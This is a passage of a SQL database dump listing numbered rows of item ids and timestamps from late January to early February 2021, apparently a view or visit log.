06:08:56'),(12360,2309,1,'2021-01-28','2021-01-28 06:08:58'),(12361,2309,1,'2021-01-28','2021-01-28 06:11:15'),(12362,1720,1,'2021-01-28','2021-01-28 06:24:23'),(12363,2775,1,'2021-01-28','2021-01-28 06:24:30'),(12364,1594,1,'2021-01-28','2021-01-28 06:24:39'),(12365,108,1,'2021-01-28','2021-01-28 06:28:21'),(12366,1709,1,'2021-01-28','2021-01-28 06:31:00'),(12367,1774,1,'2021-01-28','2021-01-28 07:11:39'),(12368,473,1,'2021-01-28','2021-01-28 07:33:28'),(12369,1584,1,'2021-01-28','2021-01-28 07:59:19'),(12370,2769,1,'2021-01-28','2021-01-28 08:01:01'),(12371,486,1,'2021-01-28','2021-01-28 09:00:10'),(12372,1612,1,'2021-01-28','2021-01-28 09:56:49'),(12373,2309,1,'2021-01-28','2021-01-28 10:12:11'),(12374,3005,1,'2021-01-28','2021-01-28 10:27:16'),(12375,2178,1,'2021-01-28','2021-01-28 10:41:23'),(12376,2309,1,'2021-01-28','2021-01-28 10:59:38'),(12377,2993,1,'2021-01-28','2021-01-28 11:09:06'),(12378,2804,1,'2021-01-28','2021-01-28 11:29:10'),(12379,2457,1,'2021-01-28','2021-01-28 12:31:16'),(12380,3051,1,'2021-01-28','2021-01-28 12:51:38'),(12381,3102,1,'2021-01-28','2021-01-28 13:07:48'),(12382,474,1,'2021-01-28','2021-01-28 13:23:18'),(12383,3006,1,'2021-01-28','2021-01-28 13:26:08'),(12384,1766,1,'2021-01-28','2021-01-28 13:36:27'),(12385,2410,1,'2021-01-28','2021-01-28 13:51:04'),(12386,3127,1,'2021-01-28','2021-01-28 14:18:00'),(12387,2775,1,'2021-01-28','2021-01-28 14:21:18'),(12388,472,1,'2021-01-28','2021-01-28 14:53:46'),(12389,2813,1,'2021-01-28','2021-01-28 15:36:00'),(12390,1602,1,'2021-01-28','2021-01-28 15:47:27'),(12391,1600,1,'2021-01-28','2021-01-28 16:18:54'),(12392,1598,1,'2021-01-28','2021-01-28 16:27:44'),(12393,1598,1,'2021-01-28','2021-01-28 16:27:50'),(12394,2609,1,'2021-01-28','2021-01-28 16:45:11'),(12395,2309,1,'2021-01-28','2021-01-28 16:45:58'),(12396,2309,1,'2021-01-28','2021-01-28 16:46:07'),(12397,1602,1,'2021-01-28','2021-01-28 16:47:38'),(12398,1602,1,'2021-01-28','2021-01-28 16:53:02'),(12399,1586,1,'2021-01-28','2021-01-28 17:04:26'),(12400,87,1,'2021-01-28','2021-01-28 17:23:00'),(12401,2309,1,'2021-01-28','2021-01-28 17:32:30'),(12402,1586,1,'2021-01-28','2021-01-28 17:42:42'),(12403,1586,1,'2021-01-28','2021-01-28 17:42:47'),(12404,1586,1,'2021-01-28','2021-01-28 17:49:02'),(12405,1600,1,'2021-01-28','2021-01-28 17:54:27'),(12406,1586,1,'2021-01-28','2021-01-28 17:59:02'),(12407,1713,1,'2021-01-28','2021-01-28 18:00:12'),(12408,1586,1,'2021-01-28','2021-01-28 18:01:14'),(12409,1586,1,'2021-01-28','2021-01-28 18:03:45'),(12410,1720,1,'2021-01-28','2021-01-28 18:07:04'),(12411,1720,1,'2021-01-28','2021-01-28 18:07:11'),(12412,1720,1,'2021-01-28','2021-01-28 18:09:49'),(12413,1720,1,'2021-01-28','2021-01-28 18:13:28'),(12414,2609,1,'2021-01-28','2021-01-28 18:38:46'),(12415,1586,1,'2021-01-28','2021-01-28 19:04:10'),(12416,1582,1,'2021-01-28','2021-01-28 19:09:59'),(12417,1586,1,'2021-01-28','2021-01-28 19:10:45'),(12418,1586,1,'2021-01-28','2021-01-28 19:11:02'),(12419,1586,1,'2021-01-28','2021-01-28 19:28:38'),(12420,1718,1,'2021-01-28','2021-01-28 19:58:35'),(12421,570,1,'2021-01-28','2021-01-28 20:08:40'),(12422,1768,1,'2021-01-28','2021-01-28 20:31:11'),(12423,1582,1,'2021-01-28','2021-01-28 20:32:40'),(12424,1612,1,'2021-01-28','2021-01-28 20:49:11'),(12425,80,1,'2021-01-28','2021-01-28 21:19:22'),(12426,1598,1,'2021-01-28','2021-01-28 21:30:50'),(12427,2769,1,'2021-01-28','2021-01-28 21:42:04'),(12428,91,1,'2021-01-28','2021-01-28 22:16:41'),(12429,3069,1,'2021-01-28','2021-01-28 22:21:43'),(12430,1594,1,'2021-01-28','2021-01-28 22:41:06'),(12431,1612,1,'2021-01-28','2021-01-28 22:41:44'),(12432,76,1,'2021-01-28','2021-01-28 22:50:24'),(12433,1715,1,'2021-01-28','2021-01-28 23:23:01'),(12434,3051,1,'2021-01-28','2021-01-28 23:30:11'),(12435,2775,1,'2021-01-29','2021-01-29 00:00:42'),(12436,476,1,'2021-01-29','2021-01-29 00:11:21'),(12437,2813,1,'2021-01-29','2021-01-29 00:56:41'),(12438,2309,1,'2021-01-29','2021-01-29 01:05:55'),(12439,2309,1,'2021-01-29','2021-01-29 01:05:59'),(12440,1598,1,'2021-01-29','2021-01-29 01:41:48'),(12441,2159,1,'2021-01-29','2021-01-29 01:53:15'),(12442,3005,1,'2021-01-29','2021-01-29 02:12:19'),(12443,1588,1,'2021-01-29','2021-01-29 03:18:32'),(12444,1582,1,'2021-01-29','2021-01-29 05:12:36'),(12445,570,1,'2021-01-29','2021-01-29 06:28:05'),(12446,1598,1,'2021-01-29','2021-01-29 06:35:13'),(12447,1598,1,'2021-01-29','2021-01-29 06:35:15'),(12448,80,1,'2021-01-29','2021-01-29 07:05:05'),(12449,1604,1,'2021-01-29','2021-01-29 07:16:18'),(12450,1608,1,'2021-01-29','2021-01-29 07:18:13'),(12451,1600,1,'2021-01-29','2021-01-29 07:31:32'),(12452,1600,1,'2021-01-29','2021-01-29 07:31:37'),(12453,1608,1,'2021-01-29','2021-01-29 07:42:49'),(12454,2751,1,'2021-01-29','2021-01-29 08:01:32'),(12455,2617,1,'2021-01-29','2021-01-29 08:21:27'),(12456,3072,1,'2021-01-29','2021-01-29 08:46:22'),(12457,1606,1,'2021-01-29','2021-01-29 09:22:22'),(12458,3438,1,'2021-01-29','2021-01-29 09:29:18'),(12459,3438,1,'2021-01-29','2021-01-29 09:29:42'),(12460,2309,1,'2021-01-29','2021-01-29 09:31:11'),(12461,1588,1,'2021-01-29','2021-01-29 09:47:57'),(12462,468,1,'2021-01-29','2021-01-29 09:54:58'),(12463,3297,1,'2021-01-29','2021-01-29 10:03:46'),(12464,1598,1,'2021-01-29','2021-01-29 10:11:18'),(12465,2609,1,'2021-01-29','2021-01-29 10:15:48'),(12466,2309,1,'2021-01-29','2021-01-29 10:24:43'),(12467,2309,1,'2021-01-29','2021-01-29 10:24:55'),(12468,1608,1,'2021-01-29','2021-01-29 10:25:54'),(12469,3430,1,'2021-01-29','2021-01-29 10:32:01'),(12470,3038,1,'2021-01-29','2021-01-29 10:54:33'),(12471,3069,1,'2021-01-29','2021-01-29 10:57:28'),(12472,1604,1,'2021-01-29','2021-01-29 11:04:33'),(12473,1614,1,'2021-01-29','2021-01-29 11:05:51'),(12474,68,1,'2021-01-29','2021-01-29 11:10:30'),(12475,2769,1,'2021-01-29','2021-01-29 11:17:34'),(12476,2309,1,'2021-01-29','2021-01-29 11:46:23'),(12477,2904,1,'2021-01-29','2021-01-29 12:35:52'),(12478,1586,1,'2021-01-29','2021-01-29 12:47:31'),(12479,1766,1,'2021-01-29','2021-01-29 12:48:57'),(12480,2457,1,'2021-01-29','2021-01-29 13:57:46'),(12481,3287,1,'2021-01-29','2021-01-29 14:17:54'),(12482,1582,1,'2021-01-29','2021-01-29 14:26:16'),(12483,1602,1,'2021-01-29','2021-01-29 15:13:23'),(12484,1544,1,'2021-01-29','2021-01-29 15:35:22'),(12485,2159,1,'2021-01-29','2021-01-29 15:38:01'),(12486,80,1,'2021-01-29','2021-01-29 16:01:04'),(12487,1747,1,'2021-01-29','2021-01-29 16:28:27'),(12488,2769,1,'2021-01-29','2021-01-29 16:48:37'),(12489,76,1,'2021-01-29','2021-01-29 16:50:16'),(12490,3034,1,'2021-01-29','2021-01-29 16:50:50'),(12491,1600,1,'2021-01-29','2021-01-29 16:57:50'),(12492,1600,1,'2021-01-29','2021-01-29 17:06:28'),(12493,2769,1,'2021-01-29','2021-01-29 18:08:27'),(12494,2309,1,'2021-01-29','2021-01-29 18:17:22'),(12495,1604,1,'2021-01-29','2021-01-29 18:25:33'),(12496,1600,1,'2021-01-29','2021-01-29 19:24:26'),(12497,3069,1,'2021-01-29','2021-01-29 19:39:45'),(12498,1720,1,'2021-01-29','2021-01-29 19:49:35'),(12499,1720,1,'2021-01-29','2021-01-29 19:49:47'),(12500,1720,1,'2021-01-29','2021-01-29 19:51:32'),(12501,2309,1,'2021-01-29','2021-01-29 20:01:06'),(12502,2769,1,'2021-01-29','2021-01-29 20:05:34'),(12503,2609,1,'2021-01-29','2021-01-29 20:08:53'),(12504,1582,1,'2021-01-29','2021-01-29 20:18:50'),(12505,1594,1,'2021-01-29','2021-01-29 20:30:50'),(12506,1614,1,'2021-01-29','2021-01-29 21:08:53'),(12507,76,1,'2021-01-29','2021-01-29 21:19:38'),(12508,1598,1,'2021-01-29','2021-01-29 21:46:32'),(12509,1600,1,'2021-01-29','2021-01-29 21:56:03'),(12510,1600,1,'2021-01-29','2021-01-29 21:57:29'),(12511,1600,1,'2021-01-29','2021-01-29 21:57:58'),(12512,1600,1,'2021-01-29','2021-01-29 21:58:30'),(12513,1588,1,'2021-01-29','2021-01-29 21:58:37'),(12514,1588,1,'2021-01-29','2021-01-29 21:58:39'),(12515,1588,1,'2021-01-29','2021-01-29 21:59:09'),(12516,1715,1,'2021-01-29','2021-01-29 21:59:15'),(12517,1600,1,'2021-01-29','2021-01-29 22:00:36'),(12518,1598,1,'2021-01-29','2021-01-29 22:09:06'),(12519,1602,1,'2021-01-29','2021-01-29 22:17:48'),(12520,3127,1,'2021-01-29','2021-01-29 22:45:37'),(12521,2309,1,'2021-01-29','2021-01-29 23:21:23'),(12522,1596,1,'2021-01-29','2021-01-29 23:29:22'),(12523,2751,1,'2021-01-29','2021-01-29 23:41:29'),(12524,2248,1,'2021-01-29','2021-01-29 23:44:39'),(12525,1594,1,'2021-01-30','2021-01-30 00:10:14'),(12526,80,1,'2021-01-30','2021-01-30 00:29:24'),(12527,2159,1,'2021-01-30','2021-01-30 00:49:49'),(12528,87,1,'2021-01-30','2021-01-30 01:12:30'),(12529,467,1,'2021-01-30','2021-01-30 01:19:27'),(12530,1600,1,'2021-01-30','2021-01-30 01:39:50'),(12531,1604,1,'2021-01-30','2021-01-30 01:59:43'),(12532,108,1,'2021-01-30','2021-01-30 02:29:50'),(12533,1709,1,'2021-01-30','2021-01-30 03:20:00'),(12534,1588,1,'2021-01-30','2021-01-30 03:30:23'),(12535,1718,1,'2021-01-30','2021-01-30 04:10:59'),(12536,2503,1,'2021-01-30','2021-01-30 04:20:59'),(12537,2769,1,'2021-01-30','2021-01-30 04:51:21'),(12538,3072,1,'2021-01-30','2021-01-30 04:55:27'),(12539,2609,1,'2021-01-30','2021-01-30 05:01:28'),(12540,1709,1,'2021-01-30','2021-01-30 05:11:33'),(12541,1598,1,'2021-01-30','2021-01-30 05:13:01'),(12542,2309,1,'2021-01-30','2021-01-30 05:51:59'),(12543,2813,1,'2021-01-30','2021-01-30 06:51:48'),(12544,1600,1,'2021-01-30','2021-01-30 07:18:18'),(12545,1766,1,'2021-01-30','2021-01-30 07:19:59'),(12546,1598,1,'2021-01-30','2021-01-30 07:22:30'),(12547,1586,1,'2021-01-30','2021-01-30 07:32:41'),(12548,80,1,'2021-01-30','2021-01-30 07:52:51'),(12549,570,1,'2021-01-30','2021-01-30 08:02:40'),(12550,3287,1,'2021-01-30','2021-01-30 08:22:45'),(12551,2309,1,'2021-01-30','2021-01-30 08:46:01'),(12552,1766,1,'2021-01-30','2021-01-30 09:14:33'),(12553,2159,1,'2021-01-30','2021-01-30 09:44:08'),(12554,2813,1,'2021-01-30','2021-01-30 10:13:59'),(12555,1582,1,'2021-01-30','2021-01-30 10:34:26'),(12556,84,1,'2021-01-30','2021-01-30 11:24:22'),(12557,3038,1,'2021-01-30','2021-01-30 11:48:34'),(12558,91,1,'2021-01-30','2021-01-30 12:24:43'),(12559,3282,1,'2021-01-30','2021-01-30 12:26:52'),(12560,1600,1,'2021-01-30','2021-01-30 12:34:43'),(12561,2609,1,'2021-01-30','2021-01-30 12:44:45'),(12562,1592,1,'2021-01-30','2021-01-30 12:49:44'),(12563,2309,1,'2021-01-30','2021-01-30 12:57:04'),(12564,2159,1,'2021-01-30','2021-01-30 13:04:12'),(12565,1600,1,'2021-01-30','2021-01-30 13:04:32'),(12566,2159,1,'2021-01-30','2021-01-30 13:09:43'),(12567,1614,1,'2021-01-30','2021-01-30 13:34:27'),(12568,76,1,'2021-01-30','2021-01-30 13:34:40'),(12569,84,1,'2021-01-30','2021-01-30 13:34:47'),(12570,76,1,'2021-01-30','2021-01-30 13:34:49'),(12571,1614,1,'2021-01-30','2021-01-30 13:34:52'),(12572,1594,1,'2021-01-30','2021-01-30 14:05:44'),(12573,2309,1,'2021-01-30','2021-01-30 14:11:11'),(12574,2309,1,'2021-01-30','2021-01-30 14:11:22'),(12575,2309,1,'2021-01-30','2021-01-30 14:45:09'),(12576,1604,1,'2021-01-30','2021-01-30 15:05:12'),(12577,108,1,'2021-01-30','2021-01-30 16:15:13'),(12578,1598,1,'2021-01-30','2021-01-30 16:15:15'),(12579,1608,1,'2021-01-30','2021-01-30 16:25:50'),(12580,570,1,'2021-01-30','2021-01-30 16:45:23'),(12581,1718,1,'2021-01-30','2021-01-30 16:57:05'),(12582,1586,1,'2021-01-30','2021-01-30 17:15:40'),(12583,1588,1,'2021-01-30','2021-01-30 17:25:33'),(12584,1602,1,'2021-01-30','2021-01-30 17:35:44'),(12585,2309,1,'2021-01-30','2021-01-30 17:45:32'),(12586,2503,1,'2021-01-30','2021-01-30 17:55:41'),(12587,1588,1,'2021-01-30','2021-01-30 18:05:44'),(12588,487,1,'2021-01-30','2021-01-30 18:18:17'),(12589,87,1,'2021-01-30','2021-01-30 18:18:50'),(12590,1586,1,'2021-01-30','2021-01-30 18:25:50'),(12591,2769,1,'2021-01-30','2021-01-30 18:35:49'),(12592,2159,1,'2021-01-30','2021-01-30 18:45:52'),(12593,1718,1,'2021-01-30','2021-01-30 19:35:51'),(12594,2457,1,'2021-01-30','2021-01-30 19:45:41'),(12595,84,1,'2021-01-30','2021-01-30 19:55:49'),(12596,2609,1,'2021-01-30','2021-01-30 19:57:45'),(12597,570,1,'2021-01-30','2021-01-30 20:06:15'),(12598,570,1,'2021-01-30','2021-01-30 20:06:17'),(12599,2609,1,'2021-01-30','2021-01-30 20:14:04'),(12600,2609,1,'2021-01-30','2021-01-30 20:14:06'),(12601,2309,1,'2021-01-30','2021-01-30 20:14:07'),(12602,3261,1,'2021-01-30','2021-01-30 20:14:25'),(12603,3261,1,'2021-01-30','2021-01-30 20:14:26'),(12604,2609,1,'2021-01-30','2021-01-30 20:14:50'),(12605,2609,1,'2021-01-30','2021-01-30 20:14:51'),(12606,570,1,'2021-01-30','2021-01-30 20:15:08'),(12607,2609,1,'2021-01-30','2021-01-30 20:15:20'),(12608,1582,1,'2021-01-30','2021-01-30 20:15:51'),(12609,3261,1,'2021-01-30','2021-01-30 20:16:07'),(12610,2609,1,'2021-01-30','2021-01-30 20:16:19'),(12611,570,1,'2021-01-30','2021-01-30 20:16:34'),(12612,1614,1,'2021-01-30','2021-01-30 20:25:41'),(12613,1614,1,'2021-01-30','2021-01-30 20:35:53'),(12614,80,1,'2021-01-30','2021-01-30 20:45:44'),(12615,91,1,'2021-01-30','2021-01-30 20:55:50'),(12616,2964,1,'2021-01-30','2021-01-30 21:03:53'),(12617,2964,1,'2021-01-30','2021-01-30 21:03:57'),(12618,1582,1,'2021-01-30','2021-01-30 21:25:55'),(12619,80,1,'2021-01-30','2021-01-30 21:46:01'),(12620,2457,1,'2021-01-30','2021-01-30 22:46:18'),(12621,2609,1,'2021-01-30','2021-01-30 23:26:29'),(12622,2159,1,'2021-01-30','2021-01-30 23:36:41'),(12623,1606,1,'2021-01-31','2021-01-31 00:07:03'),(12624,2813,1,'2021-01-31','2021-01-31 00:47:26'),(12625,1598,1,'2021-01-31','2021-01-31 00:57:33'),(12626,2159,1,'2021-01-31','2021-01-31 01:10:01'),(12627,1600,1,'2021-01-31','2021-01-31 01:18:08'),(12628,2309,1,'2021-01-31','2021-01-31 01:28:04'),(12629,3038,1,'2021-01-31','2021-01-31 01:54:46'),(12630,1588,1,'2021-01-31','2021-01-31 02:47:51'),(12631,1596,1,'2021-01-31','2021-01-31 02:52:56'),(12632,1596,1,'2021-01-31','2021-01-31 02:54:33'),(12633,80,1,'2021-01-31','2021-01-31 02:55:49'),(12634,1596,1,'2021-01-31','2021-01-31 02:57:41'),(12635,1596,1,'2021-01-31','2021-01-31 02:58:11'),(12636,1596,1,'2021-01-31','2021-01-31 03:13:50'),(12637,1596,1,'2021-01-31','2021-01-31 03:16:41'),(12638,76,1,'2021-01-31','2021-01-31 03:16:49'),(12639,1596,1,'2021-01-31','2021-01-31 03:17:14'),(12640,68,1,'2021-01-31','2021-01-31 05:11:05'),(12641,2993,1,'2021-01-31','2021-01-31 06:43:05'),(12642,2309,1,'2021-01-31','2021-01-31 07:51:34'),(12643,1596,1,'2021-01-31','2021-01-31 08:06:08'),(12644,1602,1,'2021-01-31','2021-01-31 09:06:15'),(12645,2309,1,'2021-01-31','2021-01-31 09:17:04'),(12646,1596,1,'2021-01-31','2021-01-31 09:17:32'),(12647,1774,1,'2021-01-31','2021-01-31 10:04:14'),(12648,1600,1,'2021-01-31','2021-01-31 10:19:17'),(12649,2309,1,'2021-01-31','2021-01-31 10:54:31'),(12650,1588,1,'2021-01-31','2021-01-31 12:52:12'),(12651,3030,1,'2021-01-31','2021-01-31 12:58:16'),(12652,2309,1,'2021-01-31','2021-01-31 12:58:57'),(12653,2309,1,'2021-01-31','2021-01-31 13:33:25'),(12654,2309,1,'2021-01-31','2021-01-31 13:33:31'),(12655,2309,1,'2021-01-31','2021-01-31 13:42:29'),(12656,2309,1,'2021-01-31','2021-01-31 13:43:18'),(12657,2309,1,'2021-01-31','2021-01-31 13:43:26'),(12658,1602,1,'2021-01-31','2021-01-31 13:49:29'),(12659,1594,1,'2021-01-31','2021-01-31 13:55:30'),(12660,2309,1,'2021-01-31','2021-01-31 14:15:26'),(12661,2159,1,'2021-01-31','2021-01-31 14:24:08'),(12662,2309,1,'2021-01-31','2021-01-31 16:19:00'),(12663,2159,1,'2021-01-31','2021-01-31 18:22:35'),(12664,1608,1,'2021-01-31','2021-01-31 18:28:41'),(12665,2309,1,'2021-01-31','2021-01-31 18:52:35'),(12666,2309,1,'2021-01-31','2021-01-31 19:03:02'),(12667,2309,1,'2021-01-31','2021-01-31 19:16:30'),(12668,2309,1,'2021-01-31','2021-01-31 19:26:24'),(12669,1604,1,'2021-01-31','2021-01-31 19:40:35'),(12670,3087,1,'2021-01-31','2021-01-31 20:22:26'),(12671,2309,1,'2021-01-31','2021-01-31 20:26:09'),(12672,1586,1,'2021-01-31','2021-01-31 21:47:19'),(12673,76,1,'2021-01-31','2021-01-31 21:47:57'),(12674,1586,1,'2021-01-31','2021-01-31 21:48:32'),(12675,91,1,'2021-01-31','2021-01-31 21:48:41'),(12676,1586,1,'2021-01-31','2021-01-31 21:48:49'),(12677,76,1,'2021-01-31','2021-01-31 21:48:57'),(12678,89,1,'2021-01-31','2021-01-31 21:49:24'),(12679,1586,1,'2021-01-31','2021-01-31 21:49:58'),(12680,2309,1,'2021-01-31','2021-01-31 22:58:05'),(12681,2309,1,'2021-01-31','2021-01-31 22:59:18'),(12682,2309,1,'2021-01-31','2021-01-31 22:59:28'),(12683,3030,1,'2021-01-31','2021-01-31 23:35:13'),(12684,1586,1,'2021-01-31','2021-01-31 23:57:53'),(12685,2309,1,'2021-02-01','2021-02-01 00:21:01'),(12686,2309,1,'2021-02-01','2021-02-01 00:38:31'),(12687,2309,1,'2021-02-01','2021-02-01 00:38:34'),(12688,2309,1,'2021-02-01','2021-02-01 00:52:57'),(12689,2309,1,'2021-02-01','2021-02-01 01:39:47'),(12690,2178,1,'2021-02-01','2021-02-01 01:46:25'),(12691,1598,1,'2021-02-01','2021-02-01 03:27:57'),(12692,1598,1,'2021-02-01','2021-02-01 03:28:07'),(12693,1870,1,'2021-02-01','2021-02-01 08:08:06'),(12694,1600,1,'2021-02-01','2021-02-01 08:25:34'),(12695,80,1,'2021-02-01','2021-02-01 08:26:53'),(12696,1600,1,'2021-02-01','2021-02-01 08:28:08'),(12697,1600,1,'2021-02-01','2021-02-01 08:28:20'),(12698,80,1,'2021-02-01','2021-02-01 08:28:29'),(12699,80,1,'2021-02-01','2021-02-01 08:36:27'),(12700,1600,1,'2021-02-01','2021-02-01 08:37:53'),(12701,1718,1,'2021-02-01','2021-02-01 09:08:08'),(12702,1718,1,'2021-02-01','2021-02-01 09:08:50'),(12703,80,1,'2021-02-01','2021-02-01 09:14:07'),(12704,1586,1,'2021-02-01','2021-02-01 09:36:04'),(12705,1699,1,'2021-02-01','2021-02-01 09:58:51'),(12706,2609,1,'2021-02-01','2021-02-01 11:15:46'),(12707,1586,1,'2021-02-01','2021-02-01 11:37:08'),(12708,2159,1,'2021-02-01','2021-02-01 12:07:04'),(12709,2159,1,'2021-02-01','2021-02-01 12:07:39'),(12710,1741,1,'2021-02-01','2021-02-01 12:10:16'),(12711,1612,1,'2021-02-01','2021-02-01 12:53:20'),(12712,1586,1,'2021-02-01','2021-02-01 13:45:03'),(12713,468,1,'2021-02-01','2021-02-01 14:02:45'),(12714,91,1,'2021-02-01','2021-02-01 14:03:24'),(12715,2178,1,'2021-02-01','2021-02-01 14:08:56'),(12716,1586,1,'2021-02-01','2021-02-01 14:21:49'),(12717,76,1,'2021-02-01','2021-02-01 14:23:26'),(12718,1586,1,'2021-02-01','2021-02-01 14:39:48'),(12719,1602,1,'2021-02-01','2021-02-01 14:44:39'),(12720,2297,1,'2021-02-01','2021-02-01 15:17:30'),(12721,2297,1,'2021-02-01','2021-02-01 15:20:06'),(12722,1600,1,'2021-02-01','2021-02-01 15:35:43'),(12723,1592,1,'2021-02-01','2021-02-01 16:58:56'),(12724,1586,1,'2021-02-01','2021-02-01 20:26:36'),(12725,1612,1,'2021-02-01','2021-02-01 23:19:13'),(12726,3030,1,'2021-02-01','2021-02-01 23:36:57'),(12727,1596,1,'2021-02-02','2021-02-02 00:07:24'),(12728,68,1,'2021-02-02','2021-02-02 00:07:50'),(12729,1596,1,'2021-02-02','2021-02-02 00:08:01'),(12730,1602,1,'2021-02-02','2021-02-02 02:07:36'),(12731,1602,1,'2021-02-02','2021-02-02 02:07:42'),(12732,2309,1,'2021-02-02','2021-02-02 04:51:49'),(12733,2309,1,'2021-02-02','2021-02-02 04:51:51'),(12734,2309,1,'2021-02-02','2021-02-02 04:52:33'),(12735,1598,1,'2021-02-02','2021-02-02 06:13:32'),(12736,1598,1,'2021-02-02','2021-02-02 06:14:20'),(12737,570,1,'2021-02-02','2021-02-02 08:27:35'),(12738,570,1,'2021-02-02','2021-02-02 10:13:13'),(12739,1586,1,'2021-02-02','2021-02-02 11:07:19'),(12740,91,1,'2021-02-02','2021-02-02 11:39:04'),(12741,3030,1,'2021-02-02','2021-02-02 11:49:41'),(12742,1598,1,'2021-02-02','2021-02-02 12:35:49'),(12743,1588,1,'2021-02-02','2021-02-02 12:53:45'),(12744,87,1,'2021-02-02','2021-02-02 12:58:19'),(12745,87,1,'2021-02-02','2021-02-02 12:58:22'),(12746,1586,1,'2021-02-02','2021-02-02 13:24:49'),(12747,1778,1,'2021-02-02','2021-02-02 13:25:13'),(12748,3030,1,'2021-02-02','2021-02-02 15:15:55'),(12749,1586,1,'2021-02-02','2021-02-02 15:49:15'),(12750,1586,1,'2021-02-02','2021-02-02 15:49:30'),(12751,1720,1,'2021-02-02','2021-02-02 15:52:44'),(12752,1720,1,'2021-02-02','2021-02-02 15:52:46'),(12753,1586,1,'2021-02-02','2021-02-02 16:04:07'),(12754,1720,1,'2021-02-02','2021-02-02 16:04:58'),(12755,3269,1,'2021-02-02','2021-02-02 16:33:09'),(12756,3030,1,'2021-02-02','2021-02-02 17:18:33'),(12757,3430,1,'2021-02-02','2021-02-02 17:40:09'),(12758,1582,1,'2021-02-02','2021-02-02 17:40:09'),(12759,1596,1,'2021-02-02','2021-02-02 17:40:12'),(12760,1602,1,'2021-02-02','2021-02-02 17:40:13'),(12761,1612,1,'2021-02-02','2021-02-02 17:40:13'),(12762,1596,1,'2021-02-02','2021-02-02 17:40:13'),(12763,1604,1,'2021-02-02','2021-02-02 17:40:14'),(12764,1600,1,'2021-02-02','2021-02-02 17:40:14'),(12765,1602,1,'2021-02-02','2021-02-02 17:40:15'),(12766,2309,1,'2021-02-02','2021-02-02 17:40:15'),(12767,1612,1,'2021-02-02','2021-02-02 17:40:15'),(12768,1586,1,'2021-02-02','2021-02-02 17:40:15'),(12769,1586,1,'2021-02-02','2021-02-02 17:40:16'),(12770,1602,1,'2021-02-02','2021-02-02 17:40:16'),(12771,2178,1,'2021-02-02','2021-02-02 17:40:17'),(12772,1598,1,'2021-02-02','2021-02-02 17:40:17'),(12773,1600,1,'2021-02-02','2021-02-02 17:40:17'),(12774,1612,1,'2021-02-02','2021-02-02 17:40:17'),(12775,2159,1,'2021-02-02','2021-02-02 17:40:18'),(12776,1608,1,'2021-02-02','2021-02-02 17:40:18'),(12777,1608,1,'2021-02-02','2021-02-02 17:40:18'),(12778,2159,1,'2021-02-02','2021-02-02 17:40:19'),(12779,3282,1,'2021-02-02','2021-02-02 17:40:19'),(12780,1598,1,'2021-02-02','2021-02-02 17:40:20'),(12781,1594,1,'2021-02-02','2021-02-02 17:40:20'),(12782,1612,1,'2021-02-02','2021-02-02 19:34:39'),(12783,1870,1,'2021-02-02','2021-02-02 23:10:52'),(12784,3030,1,'2021-02-03','2021-02-03 00:49:08'),(12785,3030,1,'2021-02-03','2021-02-03 00:50:47'),(12786,2769,1,'2021-02-03','2021-02-03 05:30:45'),(12787,2503,1,'2021-02-03','2021-02-03 07:40:21'),(12788,68,1,'2021-02-03','2021-02-03 07:43:21'),(12789,76,1,'2021-02-03','2021-02-03 07:44:07'),(12790,80,1,'2021-02-03','2021-02-03 07:45:18'),(12791,1588,1,'2021-02-03','2021-02-03 09:29:19'),(12792,1588,1,'2021-02-03','2021-02-03 09:47:53'),(12793,91,1,'2021-02-03','2021-02-03 09:50:45'),(12794,1588,1,'2021-02-03','2021-02-03 09:56:28'),(12795,3030,1,'2021-02-03','2021-02-03 10:15:09'),(12796,1586,1,'2021-02-03','2021-02-03 10:45:15'),(12797,2309,1,'2021-02-03','2021-02-03 11:01:17'),(12798,1582,1,'2021-02-03','2021-02-03 11:12:27'),(12799,80,1,'2021-02-03','2021-02-03 11:13:47'),(12800,80,1,'2021-02-03','2021-02-03 11:14:13'),(12801,1582,1,'2021-02-03','2021-02-03 11:14:27'),(12802,1588,1,'2021-02-03','2021-02-03 11:16:53'),(12803,3030,1,'2021-02-03','2021-02-03 11:18:44'),(12804,76,1,'2021-02-03','2021-02-03 11:19:35'),(12805,91,1,'2021-02-03','2021-02-03 11:20:41'),(12806,89,1,'2021-02-03','2021-02-03 11:22:06'),(12807,1582,1,'2021-02-03','2021-02-03 11:23:57'),(12808,76,1,'2021-02-03','2021-02-03 11:35:07'),(12809,2503,1,'2021-02-03','2021-02-03 11:39:18'),(12810,76,1,'2021-02-03','2021-02-03 11:40:26'),(12811,1582,1,'2021-02-03','2021-02-03 11:40:30'),(12812,89,1,'2021-02-03','2021-02-03 11:43:01'),(12813,3030,1,'2021-02-03','2021-02-03 11:48:56'),(12814,2309,1,'2021-02-03','2021-02-03 12:58:43'),(12815,1586,1,'2021-02-03','2021-02-03 13:43:17'),(12816,80,1,'2021-02-03','2021-02-03 13:44:43'),(12817,1600,1,'2021-02-03','2021-02-03 13:46:31'),(12818,91,1,'2021-02-03','2021-02-03 13:47:37'),(12819,72,1,'2021-02-03','2021-02-03 14:00:06'),(12820,3058,1,'2021-02-03','2021-02-03 14:01:14'),(12821,84,1,'2021-02-03','2021-02-03 14:12:11'),(12822,91,1,'2021-02-03','2021-02-03 14:14:05'),(12823,1586,1,'2021-02-03','2021-02-03 14:44:58'),(12824,1586,1,'2021-02-03','2021-02-03 14:46:24'),(12825,3045,1,'2021-02-03','2021-02-03 16:01:11'),(12826,1592,1,'2021-02-03','2021-02-03 16:07:20'),(12827,1586,1,'2021-02-03','2021-02-03 16:19:17'),(12828,1586,1,'2021-02-03','2021-02-03 16:20:52'),(12829,1592,1,'2021-02-03','2021-02-03 16:32:18'),(12830,1600,1,'2021-02-03','2021-02-03 16:48:30'),(12831,3030,1,'2021-02-03','2021-02-03 17:54:07'),(12832,1870,1,'2021-02-03','2021-02-03 18:59:14'),(12833,1588,1,'2021-02-03','2021-02-03 21:23:02'),(12834,1726,1,'2021-02-03','2021-02-03 21:23:38'),(12835,1588,1,'2021-02-03','2021-02-03 21:24:17'),(12836,1612,1,'2021-02-03','2021-02-03 22:21:26'),(12837,1594,1,'2021-02-04','2021-02-04 00:38:50'),(12838,1586,1,'2021-02-04','2021-02-04 01:16:24'),(12839,2769,1,'2021-02-04','2021-02-04 04:27:15'),(12840,3030,1,'2021-02-04','2021-02-04 05:18:23'),(12841,3030,1,'2021-02-04','2021-02-04 06:35:36'),(12842,2309,1,'2021-02-04','2021-02-04 11:24:28'),(12843,1600,1,'2021-02-04','2021-02-04 11:25:53'),(12844,2751,1,'2021-02-04','2021-02-04 11:43:00'),(12845,72,1,'2021-02-04','2021-02-04 